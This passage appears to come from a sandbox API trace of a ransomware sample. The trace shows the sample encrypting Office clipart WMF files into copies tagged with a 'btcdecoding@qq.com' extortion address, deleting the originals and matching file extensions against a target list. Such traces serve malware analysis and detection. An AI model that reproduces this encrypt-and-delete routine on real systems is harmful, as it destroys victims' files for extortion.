nNumberOfBytesToWrite=0xaf0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xaf0, lpOverlapped=0x0) returned 1 [0059.219] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.219] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.219] SetEndOfFile (hFile=0x204) returned 1 [0059.219] CloseHandle (hObject=0x204) returned 1 [0059.219] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.219] SetEndOfFile (hFile=0x1fc) returned 1 [0059.220] CloseHandle (hObject=0x1fc) returned 1 [0059.220] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.220] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf")) returned 1 [0059.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0059.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0059.220] lstrlenW (lpString=".doc") returned 4 [0059.220] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.220] lstrlenW (lpString=".docx") returned 5 [0059.220] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.220] lstrlenW (lpString=".pdf") returned 4 [0059.220] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.220] lstrlenW (lpString=".xls") returned 4 [0059.220] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.220] lstrlenW (lpString=".xlsx") returned 5 [0059.221] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.221] lstrlenW (lpString=".ppt") returned 4 [0059.221] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0059.221] lstrlenW (lpString=".zip") returned 4 [0059.221] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.221] lstrlenW (lpString=".rar") returned 4 [0059.221] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.221] lstrlenW (lpString=".bz2") returned 4 [0059.221] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.221] lstrlenW (lpString=".7z") returned 3 [0059.221] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0059.221] lstrlenW (lpString=".dbf") returned 4 [0059.221] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0059.221] lstrlenW (lpString=".1cd") returned 4 [0059.221] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0059.221] lstrlenW (lpString=".jpg") returned 4 [0059.221] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.221] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=2960) returned 1 [0059.221] CloseHandle (hObject=0x1fc) returned 1 [0059.221] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf")) returned 0x20 [0059.222] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0059.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0059.222] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.222] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0059.222] GetLastError () returned 0x0 [0059.222] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xb90, lpOverlapped=0x0) returned 1 [0059.224] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xba0, lpOverlapped=0x0) returned 1 [0059.225] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.225] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.225] SetEndOfFile (hFile=0x204) returned 1 [0059.225] CloseHandle (hObject=0x204) returned 1 [0059.225] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.225] SetEndOfFile (hFile=0x1fc) returned 1 [0059.226] CloseHandle (hObject=0x1fc) returned 1 [0059.226] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.226] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf")) returned 1 [0059.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0059.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0059.226] lstrlenW (lpString=".doc") returned 4 [0059.226] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.226] lstrlenW (lpString=".docx") returned 5 [0059.226] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.227] lstrlenW (lpString=".pdf") returned 4 [0059.227] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.227] lstrlenW (lpString=".xls") returned 4 [0059.227] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.227] lstrlenW (lpString=".xlsx") returned 5 [0059.227] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.227] lstrlenW (lpString=".ppt") returned 4 [0059.227] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0059.227] lstrlenW (lpString=".zip") returned 4 [0059.227] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.227] lstrlenW (lpString=".rar") returned 4 [0059.227] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.227] lstrlenW (lpString=".bz2") returned 4 [0059.227] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.227] lstrlenW (lpString=".7z") returned 3 [0059.227] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0059.227] lstrlenW (lpString=".dbf") returned 4 [0059.227] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0059.227] lstrlenW (lpString=".1cd") returned 4 [0059.227] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0059.227] lstrlenW (lpString=".jpg") returned 4 [0059.227] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.228] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.228] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0059.228] GetLastError () returned 0x0 [0059.228] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xb90, lpOverlapped=0x0) returned 1 [0060.048] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xba0, lpOverlapped=0x0) returned 1 [0060.049] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.049] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.049] SetEndOfFile (hFile=0x204) returned 1 [0060.084] CloseHandle (hObject=0x204) returned 1 [0060.084] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.084] SetEndOfFile (hFile=0x1fc) returned 1 [0060.085] CloseHandle (hObject=0x1fc) returned 1 [0060.085] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.085] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf")) returned 1 [0060.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0060.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0060.187] lstrlenW (lpString=".doc") returned 4 [0060.187] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.187] lstrlenW (lpString=".docx") returned 5 [0060.188] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.188] lstrlenW (lpString=".pdf") returned 4 [0060.188] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.188] lstrlenW (lpString=".xls") returned 4 [0060.188] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.188] lstrlenW (lpString=".xlsx") returned 5 [0060.188] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.188] lstrlenW (lpString=".ppt") returned 4 [0060.188] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0060.188] lstrlenW (lpString=".zip") returned 4 [0060.188] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.188] lstrlenW (lpString=".rar") returned 4 [0060.188] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.188] lstrlenW (lpString=".bz2") returned 4 [0060.188] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.188] lstrlenW (lpString=".7z") returned 3 [0060.188] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0060.188] lstrlenW (lpString=".dbf") returned 4 [0060.188] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0060.188] lstrlenW (lpString=".1cd") returned 4 [0060.188] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0060.188] lstrlenW (lpString=".jpg") returned 4 [0060.188] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.493] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.493] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.493] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0060.494] GetLastError () returned 0x0 [0060.494] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xbb4, lpOverlapped=0x0) returned 1 [0060.497] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xbc0, lpOverlapped=0x0) returned 1 [0060.498] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.498] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.498] SetEndOfFile (hFile=0x1a4) returned 1 [0060.498] CloseHandle (hObject=0x1a4) returned 1 [0060.498] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.498] SetEndOfFile (hFile=0x158) returned 1 [0060.499] CloseHandle (hObject=0x158) returned 1 [0060.499] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.499] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf")) returned 1 [0060.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0060.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0060.499] lstrlenW (lpString=".doc") returned 4 [0060.499] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.499] lstrlenW (lpString=".docx") returned 5 [0060.499] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.499] lstrlenW (lpString=".pdf") returned 4 [0060.499] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.500] lstrlenW (lpString=".xls") returned 4 [0060.500] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.500] lstrlenW (lpString=".xlsx") returned 5 [0060.500] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.500] lstrlenW (lpString=".ppt") returned 4 [0060.500] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0060.500] lstrlenW (lpString=".zip") returned 4 [0060.500] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.500] lstrlenW (lpString=".rar") returned 4 [0060.500] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.500] lstrlenW (lpString=".bz2") returned 4 [0060.500] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.500] lstrlenW (lpString=".7z") returned 3 [0060.500] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0060.500] lstrlenW (lpString=".dbf") returned 4 [0060.500] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0060.500] lstrlenW (lpString=".1cd") returned 4 [0060.500] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 63 [0060.500] lstrlenW (lpString=".jpg") returned 4 [0060.500] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.500] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.501] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0060.501] GetLastError () returned 0x0 [0060.501] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x8f8, lpOverlapped=0x0) returned 1 [0060.502] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x900, lpOverlapped=0x0) returned 1 [0060.503] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.503] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.503] SetEndOfFile (hFile=0x1a4) returned 1 [0060.504] CloseHandle (hObject=0x1a4) returned 1 [0060.504] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.504] SetEndOfFile (hFile=0x158) returned 1 [0060.504] CloseHandle (hObject=0x158) returned 1 [0060.504] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.505] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf")) returned 1 [0060.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0060.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0060.505] lstrlenW (lpString=".doc") returned 4 [0060.505] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.505] lstrlenW (lpString=".docx") returned 5 [0060.505] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.505] lstrlenW (lpString=".pdf") returned 4 [0060.505] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.505] lstrlenW (lpString=".xls") returned 4 [0060.505] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.505] lstrlenW (lpString=".xlsx") returned 5 [0060.505] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.505] lstrlenW (lpString=".ppt") returned 4 [0060.505] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0060.505] lstrlenW (lpString=".zip") returned 4 [0060.505] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.505] lstrlenW (lpString=".rar") returned 4 [0060.505] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.505] lstrlenW (lpString=".bz2") returned 4 [0060.505] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.506] lstrlenW (lpString=".7z") returned 3 [0060.506] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0060.506] lstrlenW (lpString=".dbf") returned 4 [0060.506] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0060.506] lstrlenW (lpString=".1cd") returned 4 [0060.506] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63 [0060.506] lstrlenW (lpString=".jpg") returned 4 [0060.506] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.506] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.506] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0060.507] GetLastError () returned 0x0 [0060.507] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x2174, lpOverlapped=0x0) returned 1 [0060.509] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x2180, lpOverlapped=0x0) returned 1 [0060.510] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.510] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.510] SetEndOfFile (hFile=0x1a4) returned 1 [0060.510] CloseHandle (hObject=0x1a4) returned 1 [0060.510] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.510] SetEndOfFile (hFile=0x158) returned 1 [0060.511] CloseHandle (hObject=0x158) returned 1 [0060.511] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.511] DeleteFileW (lpFileName="C:\\Program 